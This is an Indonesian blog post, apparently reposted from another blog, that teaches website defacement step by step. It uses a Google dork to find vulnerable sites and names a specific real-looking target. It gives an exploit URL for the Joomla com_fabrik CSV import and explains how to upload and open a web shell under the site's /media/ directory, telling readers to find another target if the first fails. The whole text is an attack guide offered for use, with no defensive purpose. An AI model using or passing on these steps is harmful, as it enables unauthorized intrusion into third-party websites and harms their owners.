Adapun bahan-bahannya:
1. Dork Google
2. Shell Download
Caranya sebagai berikut:
1. Ketikkan dark google "inurl:viewTable?cid= site:net " dipencarian google.
2. Target yang akan saya coba deface adalah Unali Hair Setelah web dibuka, maka akan muncul Sorry this form is not publish menandakan bahwa web tersebut terdapat celah yang masih dapat di tembus para defacer.
3. Kemudian tambahkan exploit ini : index.php option=com_fabrik&c=import&view=import&filetype=csv&table=1 di belakang web target yang kita ingin deface tadi.
Maka akan menjadi seperti ini: http://www.unali.net/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 Lalu tekan ENTER
Tampilan web akan berubah menjadi (seperti gambar berikut)
4. Selanjutnya upload shell yang telah kalian download tadi (Pilih Browse) Kemudian klik import CSV
5. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar dibawah ini atau mungkin berbeda dengan gambar dibawah.
6. Lalu masuk ke dalam shellnya www.unali.net/media/nama shell kamu.html
Contoh: www.unali.net/media/akhmadfauzan.html
Jika berhasil, maka akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain.
Demikian, semoga bermanfaat.
Thanks
Source: "http://portaltutorialku.blogspot.co.id/2016/10/tutorial-deface-web.html"
About tkjsmkn1ts.blogdpot.com
Hi, My Name is Akhmad Fauzan. I am a Network Engineer, SysAdmin, Web Design, Technician Computer.
0 komentar:
Posting Komentar